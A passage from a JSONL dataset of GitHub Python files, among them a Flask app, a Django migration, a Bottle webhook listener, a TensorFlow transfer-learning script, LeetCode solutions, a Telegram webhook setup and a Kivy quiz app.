eps)\n x[i] -= eps*sign[i]\n out[i] -= self._diff(x[:i+1], th, eps)\n out[i] /= eps\n\n out = abs(out)\n return out\n\n def _diff(self, x, th, eps):\n \"\"\"\n Differentiation function.\n\n Numerical approximation of a Rosenblatt transformation created from\n copula formulation.\n \"\"\"\n foo = lambda y: self.igen(np.sum(self.gen(y, th), 0), th)\n\n out1 = out2 = 0.\n sign = 1 - 2*(x>.5).T\n for I in np.ndindex(*((2,)*(len(x)-1)+(1,))):\n\n eps_ = np.array(I)*eps\n x_ = (x.T + sign*eps_).T\n out1 += (-1)**sum(I)*foo(x_)\n\n x_[-1] = 1\n out2 += (-1)**sum(I)*foo(x_)\n\n out = out1/out2\n return out\n\n\n def _bnd(self, **prm):\n return 0,1\n","repo_name":"davidovitch/chaospy","sub_path":"src/chaospy/dist/copulas/baseclass.py","file_name":"baseclass.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"12198627562","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/10/14 15:06\n# @Author : yangmingming\n# @Site : \n# @File : main.py\n# @Software: PyCharm\n\nfrom flask import Flask\nfrom config import DevConfig\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_object(DevConfig)\n\n\n@app.route('/')\ndef home():\n return \"hello word\"\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Jsonming/flask_learn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2279699106","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020-03-19 07:29:51\n# @Author : mutudeh (josephmathone@gmail.com)\n# @Link : ${link}\n# @Version : $Id$\n\nimport os\n\nclass Solution(object):\n # 使用栈进行求解\n def lengthLongestPath(self, input):\n if '.' not in input:\n return 0\n input = input.split('\\n')\n depth_file = []\n for tem in input:\n depth = tem.count('\\t')\n # 消除括号,只保留文件名\n depth_file.append([depth,tem[depth:]])\n\n print(depth_file)\n def cal_len(stack):\n length = 0\n for i in stack:\n # +1 means plus '/'\n length += len(i[1]) +1\n return length - 1\n\n # stack is to store the path with asceding \\t from bottom to top\n stack = []\n max_length = 0\n for tem in depth_file:\n while stack and tem[0] <= stack[-1][0]:\n stack.pop()\n stack.append(tem)\n # if the current string contains '.', it means we reach the bottom of one path\n if '.' in tem[1]:\n max_length = max(max_length,cal_len(stack))\n return max_length\n\ns = Solution()\nprint(s.lengthLongestPath(\"dir\\n file.txt\"))\n\n\n\n","repo_name":"joseph-mutu/Codes-of-Algorithms-and-Data-Structure","sub_path":"Leetcode/[388]文件的绝对的长度.py","file_name":"[388]文件的绝对的长度.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36472326696","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Family',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('family_name', models.CharField(max_length=200)),\n ('street_address1', models.CharField(max_length=200)),\n ('street_address2', models.CharField(blank=True, max_length=200)),\n ('zip_code', models.IntegerField(validators=[django.core.validators.RegexValidator(regex='^\\\\d{5}$', message='Please enter a five-digit ZIP code.')])),\n ('home_phone', models.IntegerField(blank=True, validators=[django.core.validators.RegexValidator(regex='^\\\\d{10}$', message='Please enter a ten-digit phone number.')], null=True)),\n ('last_paid', models.DateField(verbose_name='date dues paid')),\n ('dues_amount', models.PositiveSmallIntegerField()),\n ('comment', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('last_name', models.CharField(max_length=200)),\n ('first_name', models.CharField(max_length=200)),\n ('email', models.EmailField(blank=True, max_length=254, validators=[django.core.validators.EmailValidator()], null=True)),\n ('personal_phone', models.IntegerField(blank=True, validators=[django.core.validators.RegexValidator(regex='^\\\\d{10}$', message='Please enter a ten-digit phone number.')], null=True)),\n ('family', models.ForeignKey(to='membership.Family')),\n ],\n ),\n ]\n","repo_name":"dscush/friendsgpl","sub_path":"membership/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16523776213","text":"# Marketplace Product Registration Page\nVERSION = '0.0.1'\nBOTTLEIP = '0.0.0.0'\nBOTTLEPORT = '13175'\n\n# Install Requrirements via PIP\nfrom bottle import Bottle, route, get, post, request, response, run, static_file, template # Webserver\n\n#------------------------------------------------------------------\n# Setup the Bottle WebServer\n#------------------------------------------------------------------\napp = Bottle(__name__)\n\n@app.hook('after_request')\ndef enable_cors():\n\t \"\"\"\n You need to add some headers to each request.\n Don't use the wildcard '*' for Access-Control-Allow-Origin in production.\n \"\"\"\n\t response.headers['Access-Control-Allow-Origin'] = '*'\n\t response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'\n\t response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n#------------------------------------------------------------------\n# Index Endpoint\n#------------------------------------------------------------------\n\n# Index Route\n@app.route('/', method='GET')\ndef index():\n print(request)\n return {'status':200, 'response':'Connection to the CloudMage API has been successfully established'}\n\n# Logo Route\n# @app.route('/logo', method='GET')\n# def logo():\n# \treturn static_file('images/logo.png', root='.', mimetype='image/png')\n\n# # EULA Route\n# @app.route('/eula', method='GET')\n# def eula():\n# \treturn template('eula')\n\n# # Registration Form Route\n@app.route('/pr', method='POST')\ndef MergeRequest():\n\t\n if 'action' in request.forms:\n pr_action = request.forms.get('action')\n print(pr_action)\n \n if 'number' in request.forms:\n pr_number = request.forms.get('number')\n print(pr_number)\n\n # This should return back as an object\n if 'changes' in request.forms:\n pr_change_obj = request.forms.get('changes')\n print(pr_change_obj)\n\n # This should also return back as an object\n if 'pull_request' in request.forms:\n pr_obj = request.forms.get('pull_request')\n print(pr_obj)\n\n return {'status':200, 'response':'Connection to the CloudMage PR API has been successfully established'}\n\n# # Submit Registration\n# @app.route('/process', method='POST')\n# def process_registration():\n \n# if 'email' in request.forms:\n# email = request.forms.get('email')\n\n# if 'username' in request.forms:\n# username = request.forms.get('username')\n \n# if 'password' in request.forms:\n# password = request.forms.get('password')\n\n# if 'domain_name' in request.forms:\n# domain_name = request.forms.get('domain_name')\n \n# ##### Resolving Customer Registration Token ##### \n# if 'mp_reg' in request.forms:\n# mptoken = request.forms.get('mp_reg')\n\n# # Resolve Customer via Marketplace Metering Service\n# marketplaceClient = boto3.client(\n# 'meteringmarketplace',\n# region_name='us-east-1'\n# )\n \n# customerData = marketplaceClient.resolve_customer(\n# RegistrationToken=mptoken\n# )\n \n# product_id = customerData['ProductCode']\n# customer_id = customerData['CustomerIdentifier']\n \n# form_data = {\n# \"email\": email,\n# \"username\": username,\n# \"password\": password,\n# \"domain_name\": domain_name,\n# \"mptoken\": mptoken,\n# \"product_id\": product_id,\n# \"customer_id\": customer_id\n# }\n\n# # TODO: Validate no other accounts share this identifier\n# # TODO: Store information away with your customer record\n\n# return template('formdata', form_data=form_data)\n\n#------------------------------------------------------------------ \n# Start the Web Server \n#------------------------------------------------------------------ \n# Run the flask server \nif __name__ == '__main__': \n app.run(host=BOTTLEIP, port=BOTTLEPORT) \n\n","repo_name":"dabombcloud/GithubListener","sub_path":"BottleListener.py","file_name":"BottleListener.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27689777975","text":"## method is from Udacity course\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport skimage.transform\nfrom six.moves import cPickle as pickle\nfrom six.moves import range\nfrom scipy.misc import imresize\nimport shutil\n\nlog_dir = '/tmp/tensorflow/Fish/logs/summaries'\ntry:\n shutil.rmtree(log_dir)\nexcept:\n print(log_dir+' is empty!')\ndropout = 0.5\nbatch_size = 60\npatch_size = 9\ndepth = 8\nnum_hidden = 32\nnum_class = 3\n## load data\npickle_file = 'FishSResNet.pickle'\nprint(\"Loading data..\")\nwith open(pickle_file, 'rb') as f:\n save = pickle.load(f)\n train_dataset = save['train_dataset']\n train_labels = save['train_labels']\n valid_dataset = save['valid_dataset']\n valid_labels = save['valid_labels']\n test_dataset = save['test_dataset']\n test_labels = save['test_labels']\n del save # hint to help gc free up memory\n print('Training set', train_dataset.shape, train_labels.shape, np.mean(train_dataset), np.std(train_dataset))\n print('Validation set', valid_dataset.shape, valid_labels.shape)\n print('Test set', test_dataset.shape, test_labels.shape)\n\n# reformat\ndef reformat(dataset, labels):\n labels = (np.arange(num_class) == labels[:, None]).astype(np.float32)\n return dataset, labels\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\ntrain_dataset, train_labels = reformat(train_dataset, train_labels)\nvalid_dataset, valid_labels = reformat(valid_dataset, valid_labels)\ntest_dataset, test_labels = reformat(test_dataset, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape, np.mean(train_dataset), np.std(train_dataset))\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)\n# Create a multilayer model.\nsess = tf.InteractiveSession()\n\n# load current structure\nnew_saver = tf.train.import_meta_graph('ResNet-L50.meta')\nnew_saver.restore(sess, './ResNet-L50.ckpt')\n\ngraph = tf.get_default_graph()\n\n# add transfer learning layer\npooling_tensor = graph.get_tensor_by_name(\"avg_pool:0\")\n\n# Input placeholders\nwith tf.name_scope('input'):\n x = graph.get_tensor_by_name(\"images:0\")\n y_ = tf.placeholder(tf.float32, shape=(batch_size, num_class), name='y-input-Labels')\n tf.summary.image('input', x, 10)\n\n\nwith tf.name_scope('avg_pooling'):\n variable_summaries(pooling_tensor)\n# retain: from pooling to fc\nwith tf.name_scope('dropout1'):\n keep_prob = tf.placeholder(tf.float32)\n tf.summary.scalar('dropout_keep_probability1', keep_prob)\n dropped = tf.nn.dropout(pooling_tensor, keep_prob)\nwith tf.name_scope('trans_fc') as scope:\n fcw = tf.Variable(tf.truncated_normal([2048, num_class], dtype=tf.float32, stddev=0.01), trainable=True, name='weights')\n fcb = tf.Variable(tf.constant(0.0, shape=[num_class], dtype=tf.float32), trainable=True, name='biases')\n y = tf.nn.bias_add(tf.matmul(dropped, fcw), fcb)\n variable_summaries(y)\n\n\n\nwith tf.name_scope('cross_entropy'):\n # The raw formulation of cross-entropy,\n #\n # tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.softmax(y)),\n # reduction_indices=[1]))\n #\n # can be numerically unstable.\n #\n # So here we use tf.nn.softmax_cross_entropy_with_logits on the\n # raw outputs of the nn_layer above, and then average across\n # the batch.\n diff = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y)\n variable_summaries(y)\n #variable_summaries(diff)\n with tf.name_scope('total'):\n cross_entropy = tf.reduce_mean(diff)\ntf.summary.scalar('cross_entropy', cross_entropy)\n\nwith tf.name_scope('train'):\n train_step = tf.train.AdamOptimizer(0.00001).minimize(cross_entropy, var_list=[fcw, fcb])\n\nwith tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar('accuracy', accuracy)\n\n# Merge all the summaries and write them out to\n# /tmp/tensorflow/mnist/logs/mnist_with_summaries (by default)\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(log_dir + '/train', sess.graph)\ntest_writer = tf.summary.FileWriter(log_dir + '/test')\n\nprint('init..')\ntf.global_variables_initializer().run()\nnew_saver.restore(sess, './ResNet-L50.ckpt')\n#init_vars_op = tf.variables_initializer([fcw,fcb])\n#sess.run(init_vars_op)\n\n# Train the model, and also write summaries.\n# Every 10th step, measure test-set accuracy, and write test summaries\n# All other steps, run train_step on training data, & add training summaries\n#print(tf.global_variables())\n\nfor i in range(8001):\n offset = (i * batch_size) % (train_labels.shape[0] - batch_size)\n batch_data = train_dataset[offset:(offset + batch_size), :, :, :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n # print(batch_data[0])\n # print(\"max,min\", np.max(batch_data[0]), np.min(batch_data[0]))\n if i % 10 == 0: # Record summaries and valid-set accuracy\n feed_dict = {x: valid_dataset, y_: valid_labels, keep_prob: 1}\n print(\"max,min\", np.max(valid_dataset[0]), np.min(valid_dataset[0]))\n summary, acc,ap = sess.run([merged, accuracy,pooling_tensor], feed_dict=feed_dict)\n test_writer.add_summary(summary, i)\n print('Accuracy at step %s: %s' % (i, acc))\n print('ap shape: ', ap.shape)\n print(\"max,min\", np.max(ap[0]), np.min(ap[0]))\n else: # Record train set summaries, and train\n feed_dict = {x: batch_data, y_: batch_labels, keep_prob: 0.5}\n if i % 100 == 99: # Record execution stats\n run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n summary, _ = sess.run([merged, train_step],\n feed_dict=feed_dict,\n options=run_options,\n run_metadata=run_metadata)\n train_writer.add_run_metadata(run_metadata, 'step%03d' % i)\n train_writer.add_summary(summary, i)\n print('Adding run metadata for', i)\n else: # Record a summary\n summary, _ = sess.run([merged, train_step], feed_dict=feed_dict)\n train_writer.add_summary(summary, i)\nsaver = tf.train.Saver()\nsave_path = saver.save(sess, \"/tmp/ResNet/Weight.ckpt\")\nprint(\"Model saved in file: %s\" % save_path)\ntrain_writer.close()\ntest_writer.close()","repo_name":"frostinassiky/Stereo-Biomass-Estimation","sub_path":"FishRecognise/ResNet/FishRecBoardResNet.py","file_name":"FishRecBoardResNet.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25861029963","text":"\"Valid Palindrome\"\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n i = 0\n j = len(s) - 1\n while i < j:\n if not s[i].isalnum():\n i += 1\n continue\n if not s[j].isalnum():\n j -= 1\n continue\n if s[i].lower() != s[j].lower():\n return False\n else:\n i += 1\n j -= 1\n return True\nprint(Solution.isPalindrome(Solution, \"A man, a plan, a canal: Panama\"))\n","repo_name":"lwd19861127/LeetCde-TopInterviewQuestions-Easy","sub_path":"IntroToAlgorithms/LeetCode/String/ValidPalindrome.py","file_name":"ValidPalindrome.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42465574002","text":"import random\n\nrare_table = {\n 1: 'uncommon',\n 2: 'rare',\n 3: 'epic',\n 4: 'legendary'\n}\n\nclass ColdWeapon:\n def __init__(self, name: str, rare: int, damage_by_rare):\n self.name = name\n self.rare = rare\n self.damage = damage_by_rare[self.rare]\n \n def __str__(self) -> str:\n return f'{self.name} : Rare: {self.rare} : Damage: {self.damage}'\n\nclass Knife(ColdWeapon):\n def __init__(self, rare):\n ColdWeapon.__init__(self, 'Knife', rare, {\n 1:1,# uncommon \n 2:5,# rare \n 3:8,# epic \n 4:13# legendary\n })\n \nclass Crowbar(ColdWeapon):\n def __init__(self,rare):\n ColdWeapon.__init__(self, 'Crowbar', rare, {\n 1:3,# uncommon \n 2:4,# rare \n 3:8,# epic \n 4:18# legendary\n })\n\nclass Axe(ColdWeapon):\n def __init__(self, rare):\n ColdWeapon.__init__(self, 'Axe', rare, {\n 1:5,# uncommon \n 2:6,# rare \n 3:8,# epic \n 4:20# legendary\n })\n\ncoldweapons = [\n Knife(1),\n Crowbar(2),\n Axe(2),\n]","repo_name":"purpl3-yt/trash-bin","sub_path":"python/Game_2.0/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13857276121","text":"from time import sleep\nimport requests\n\nfrom instabot.settings import HOST, TG_TOKEN\n\n\nurl = \"https://api.telegram.org/bot{}/\".format(TG_TOKEN)\n\n\ndef set_webhook():\n params = {'url': HOST + '/bot/' + TG_TOKEN + '/'}\n method = 'setWebhook'\n response = requests.post(url + method, params)\n print('Set webhook')\n print('Status code:', response.status_code)\n return response\n\n\ndef delete_webhook():\n method = 'deleteWebhook'\n response = requests.post(url + method)\n print('Delete webhook')\n print('Status code:', response.status_code)\n return response\n\n\ndelete_webhook()\nsleep(1)\nset_webhook()\n","repo_name":"oleshonchar/instabot","sub_path":"telegram_bot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10222058536","text":"# -*- coding: utf-8 -*-\n__version__ = '1.0'\nimport textwrap\nimport random\nimport shutil\nimport math\nimport sys\nimport os\n\nfrom kivymd.app import MDApp\nfrom kivymd.uix.screen import MDScreen\nfrom kivy.lang import Builder\nfrom kivy.factory import Factory\nfrom kivymd.toast import toast\nfrom kivy.core.window import Window\nfrom kivy.clock import Clock\nfrom kivy.animation import Animation\nfrom kivy.utils import platform\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDFlatButton\n\nfrom modules.ReadFile import AddStrings\nfrom modules.Stirrer import ListShuffle as LS\nfrom modules.SearchFiles import SearchFiles\nfrom modules.buttons.MyLongTouchButton import LongTouchButton\n\n# Здесь приложение запрашивает у системы доступ к памяти\nif platform == 'android':\n\tfrom android.permissions import request_permissions, Permission\n\trequest_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n\tfrom android.storage import primary_external_storage_path\n\nclass Enter(MDScreen):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tself.ids.Toolbar.left_action_items=[[\"menu\", lambda x: Clock.schedule_once(self.switcher)]]\n\t\tself.ids.Toolbar.right_action_items=[['file-plus-outline', lambda x: Clock.schedule_once(self.add)], ['exit-to-app', lambda x: Clock.schedule_once(self.exit_), 'выход']]\n\t\tself.count = 0\n\t\tself.ans_true = 0\n\t\tself.ids.Question.bind(on_touch_move=lambda x, touch: self.gesture_open(touch))\n\t\tWindow.bind(on_keyboard=self.key_input)\n\t\t\n\tdef file_selection(self, args):\n\t\tif args.icon == 'delete' :\n\t\t\tpass\n\t\telse:\n\t\t\t# qa получает список с двумя вложенными списками\n\t\t\tqa = AddStrings().does_adding(f'/storage/emulated/0/Zybrila/{args.text}.zybr')\n\t\t\tif qa is None:\n\t\t\t\ttoast('Файл составлен неверно', True, 80, 500, 0)\n\t\t\telif qa == 'short':\n\t\t\t\ttoast('Слишком короткое содержимое', True, 80, 500, 0)\n\t\t\telif qa == 'zero':\n\t\t\t\ttoast('Файл абсолютно пуст',\n\t\t\t\t\tTrue, 80, 500, 0)\n\t\t\telse:\n\t\t\t\t# получаем список вопросов\n\t\t\t\tself.questions = qa[0]\n\t\t\t\t# получаем список ответов\n\t\t\t\tself.true_answers = qa[1]\n\t\t\t\tClock.schedule_once(self.shuffler)\n\t\t\t\tself.ids.Toolbar.title = args.text\n\t\t\t\tClock.schedule_once(self.options_back)\n\t\t\t# создаётся список с блоками ответов\n\t\t\tself.answers = []\n\t\t\t# создаются счётчики вопросов и правильных ответов на них\n\t\t\tself.count = 0\n\t\t\tself.ans_true = 0\n\t\t\t\n\tdef shuffler(self, args):\n\t\t# списки вопросов и ответов перемешиваются в случайной последовательности, но соответствуют друг другу\n\t\tLS().shuffle(self.questions,\n\t\t\t\t\t\t\tself.true_answers)\n\t\tClock.schedule_once(self.doing)\n\n\t# процесс прохождения теста\n\tdef doing(self, args):\n\t\tself.questions = LS().quest()\n\t\tself.true_answers = LS().ans()\n\t\t# создаются блоки ответов на вопросы\n\t\tfor i in self.true_answers:\n\t\t\tself.ans = []\n\t\t\t# добавляется один правильный ответ\n\t\t\tself.ans.append(i)\n\t\t\t# добавляется 3 неправильных ответа\n\t\t\twhile len(self.ans) < 4:\n\t\t\t\tlie_ans = random.choice(\n\t\t\t\t\t\t\tself.true_answers)\n\t\t\t\tself.ans.append(lie_ans)\n\t\t\t\t# исключаются повторения с помощью метода set\n\t\t\t\tself.ans = list(set(self.ans))\n\t\t\tself.answers.append(self.ans)\n\t\t# проверка существования виджетов с ответами и их удаление\n\t\ttry:\n\t\t\tself.ids.place_for_buttons.clear_widgets()\n\t\t\tself.ids.Basic.remove_widget(self.shield)\n\t\texcept: pass\n\t\tif self.count == len(self.questions):\n\t\t\tClock.schedule_once(self.itog)\n\t\t\tself.ids.Counter_questions.text = ''\n\t\telse:\n\t\t\tself.ids.Question.text = textwrap.fill(str(self.questions[self.count]), 28)\n\t\t\trandom.shuffle(self.answers[self.count])\n\t\t\tself.ids.Counter_questions.text=f'{self.count+1} вопрос из {len(self.questions)}'\n\t\t\t# создание кнопок с вариантами ответов\n\t\t\tfor answer in self.answers[self.count]:\n\t\t\t\tvariants_btns = Factory.VariantsButtons()\n\t\t\t\tvariants_btns.bind(\n\t\t\t\t\ton_release=self.examination)\n\t\t\t\tvariants_btns.text = str(answer)\n\t\t\t\tself.ids.place_for_buttons.add_widget(variants_btns)\n\t\t\t\tself.variants_btns = variants_btns\n\t\tself.count +=1\n\n\t# проверка истинности ответа\n\tdef examination(self, args):\n\t\tif args.text == str(self.true_answers[self.count - 1]):\n\t\t\targs.md_bg_color = [.5, .7, 0, 1]\n\t\t\tself.ans_true +=1\n\t\t\ttoast(\n\t\t\t\t\t'Правильно',\n\t\t\t\t\tTrue, 80, 500, 0)\n\t\telse:\n\t\t\targs.md_bg_color = [1, 0, 0, 1]\n\t\t\ttoast(\n\t\t\t\tstr(self.true_answers[self.count - 1]),\n\t\t\t\tTrue, 80, 500, 0)\n\t\t'''ставится экран для защиты от\n\t\tнажатия, пока идёт проверка, что\n\t\tбы избежать неправильной\n\t\tработы приложения из-за\n\t\tневыдержанных таймингов\n\t\tмежду вопросами'''\n\t\tself.shield = Factory.Shield()\n\t\tself.ids.Basic.add_widget(self.shield)\n\t\tClock.schedule_once(self.doing, 1.5)\n\n\t# оценка результатов прохождения теста\n\tdef itog(self, args):\n\t\tself.ids.Question.text = f'Правильных ответов: {self.ans_true} из {self.count - 1}'\n\t\trefresh = Factory.VariantsButtons()\n\t\trefresh.bind(on_press=self.reset)\n\t\trefresh.text = 'Ещё раз?'\n\t\tself.ids.place_for_buttons.add_widget(refresh, index = 5)\n\t\tpercent_true = math.ceil(100 / len(self.questions) * self.ans_true)\n\t\tif percent_true <= 60:\n\t\t\tgrade = 'Плохо'\n\t\telif 61 < percent_true <= 80:\n\t\t\tgrade = 'Неплохо'\n\t\telif 81 < percent_true <= 95:\n\t\t\tgrade = 'Хорошо'\n\t\telse:\n\t\t\tgrade = 'Отлично'\n\t\tself.ids.Counter_questions.text = f'{grade}. Правильных ответов {percent_true}%'\n\n\tdef reset(self, args):\n\t\tself.count = 0\n\t\tself.ans_true = 0\n\t\tself.ids.place_for_buttons.clear_widgets()\n\t\tClock.schedule_once(self.doing)\n\n\t# жест пальцем по экрану\n\tdef gesture_open(self, touch):\n\t\t'''определяется расстояние для\n\t\tжеста. В данном случае это левая\n\t\tполовина экрана'''\n\t\tif touch.sx < .5:\n\t\t '''определяется скорость жеста с\n\t\t помощью дельты координат по\n\t\t оси Х'''\n\t\t if touch.dx > 10:\n\t\t \tClock.schedule_once(self.switcher)\n\n\t'''переключатель движения бокового\n\tменю. Если оно открыто, то\n\tзакроется, и наоборот'''\n\tdef switcher(self, args):\n\t\ttry:\n\t\t\tself.opt\n\t\t\tClock.schedule_once(self.options_back)\n\t\texcept:\n\t\t\tClock.schedule_once(self.options)\n\n\tdef options(self, args):\n\t\ttry:\n\t\t\tos.mkdir('/storage/emulated/0/Zybrila')\n\t\t\tshutil.copy('./Advanced english.zybr', '/storage/emulated/0/Zybrila', follow_symlinks=True)\n\t\t\tshutil.copy('./Simple english.zybr', '/storage/emulated/0/Zybrila', follow_symlinks=True)\n\t\t\tos.rename('/storage/emulated/0/Zybrila/Advanced english.zybr', '/storage/emulated/0/Zybrila/Технический английский.zybr')\n\t\t\tos.rename('/storage/emulated/0/Zybrila/Simple english.zybr', '/storage/emulated/0/Zybrila/Школа второй класс.zybr')\n\t\texcept FileExistsError:\n\t\t\tpass\n\t\tself.opt = Factory.ListBackground()\n\t\tself.opt.ids.plm.bind(on_press=self.options_back)\n\t\tself.opt.ids.Constructor.bind(on_press=self.add)\n\t\tself.ids.Basic.add_widget(self.opt)\n\t\tself.move=Animation(\n\t\t\tpos_hint={'center_x':.45, 'center_y':.46},\n\t\t\tduration=.17)\n\t\tself.move.start((self.opt))\n\t\tlist_items = SearchFiles('/storage/emulated/0/Zybrila').search('zybr', '')\n\t\tlist_items = sorted(list_items)\n\t\tfor i in list_items:\n\t\t\tself.asd = LongTouchButton(\n\t\t\t\t\ttext=i[:-5],\n\t\t\t\t\ticon='script-text-outline')\n\t\t\tself.asd.bind(on_release=self.file_selection)\n\t\t\tself.asd.bind(icon=self.change_begavior_const)\n\t\t\tself.opt.ids.Greed.add_widget(self.asd)\n\n\tdef options_back(self, args):\n\t\tself.move_back = Animation(\n\t\t\tpos_hint= {'center_x':-1, 'center_y':.46},\n\t\t\tduration=.17)\n\t\tself.move_back.start(self.opt)\n\t\tdel self.opt\n\n\tdef options_close(self, args):\n\t\tif args.icon == 'delete':\n\t\t\tpass\n\t\telse:\n\t\t\tself.move_back = Animation(\n\t\t\t\tpos_hint= {'center_x':-1, 'center_y':.46},\n\t\t\t\tduration=.17)\n\t\t\tself.move_back.start(self.opt)\n\t\t\tdel self.opt\n\n\t# изменение поведения кнопок списка при их нажатии\n\tdef change_begavior_const(self, button, args):\n\t\t# проверка, есть ли хоть один выделенный элемент списка\n\t\tL = []\n\t\tfor i in self.opt.ids.Greed.children:\n\t\t\ttry:\n\t\t\t\tif i.icon:\n\t\t\t\t\tL.append(i.icon)\n\t\t\texcept AttributeError: pass\n\t\tif L.count('delete') != 0:\n\t\t\tself.opt.ids.Constructor.text = 'Удалить'\n\t\t\tself.opt.ids.Constructor.md_bg_color = (1, 0, 0, .8)\n\t\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.add) # tyt\n\t\t\tself.opt.ids.Constructor.bind(on_press=self.delete_rec)\n\t\telse:\n\t\t\tself.opt.ids.Constructor.text = 'Конструктор'\n\t\t\tself.opt.ids.Constructor.md_bg_color = (0, .5, 0, .9)\n\t\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.delete_rec)\n\t\t\tself.opt.ids.Constructor.bind(\n\t\t\t\ton_press=self.add) # tyt\n\t\tbutton.bind(on_press=self.rebind)\n\t\tbutton.unbind(on_release=self.file_selection)\n\n\t#перепривязка кнопок\n\tdef rebind(self, args):\n\t\targs.icon = args.icon_record\n\t\targs.icon_color = (.5, .5, .5, 1)\n\t\targs.unbind(on_press=self.rebind)\n\t\targs.bind(on_release=self.auxiliary_bind)\n\n\tdef auxiliary_bind(self, args):\n\t\t'''если сделать эту привязку кнопки\n\t\tв предыдущем методе, а не\n\t\tздесь, то файл будет открываться\n\t\tдаже если он помечен для\n\t\tудаления'''\n\t\targs.bind(on_release=self.file_selection)\n\n\tdef delete_rec(self, args):\n\t\tlist_rec = []\n\t\tfor i in self.opt.ids.Greed.children:\n\t\t\ttry:\n\t\t\t\tif i.icon == 'delete':\n\t\t\t\t\tlist_rec.append(i)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\tfor i in list_rec:\n\t\t\tself.opt.ids.Greed.remove_widget(i)\n\t\t\tos.remove(\n\t\t\t\t'/storage/emulated/0/Zybrila/'\n\t\t\t\t+ str(i.text)\n\t\t\t\t+ '.zybr')\n\t\tself.opt.ids.Constructor.text = 'Конструктор'\n\t\tself.opt.ids.Constructor.md_bg_color = (0, .5, 0, .9)\n\t\tself.opt.ids.Constructor.unbind(\n\t\t\t\ton_press=self.delete_rec)\n\t\tself.opt.ids.Constructor.bind(\n\t\t\t\ton_press=self.add) # tyt\n\n\tdef add(self, args):\n\t\tself.manager.current = '2'\n\t\tself.manager.transition.direction = 'left'\n\n\tdef exit_(self, args):\n\t\tsys.exit()\n\n\t# отслеживает нажатия кн. \"назад\"\n\tdef key_input(self, window,\n\t\t\t\t\t\t\tkey, scancode,\n\t\t\t\t\t\t\tcodepoint, modifier):\n\t\ttry:\n\t\t\tif key == 27:\n\t\t\t\tfor i in self.opt.ids.Greed.children:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i.icon:\n\t\t\t\t\t\t\ti.icon = 